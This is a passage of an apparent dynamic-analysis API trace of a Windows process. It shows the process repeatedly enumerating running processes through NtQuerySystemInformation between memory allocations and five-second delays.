FreeType=0x8000) returned 0x0 [0156.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0156.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0156.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0156.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0156.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0156.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0156.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 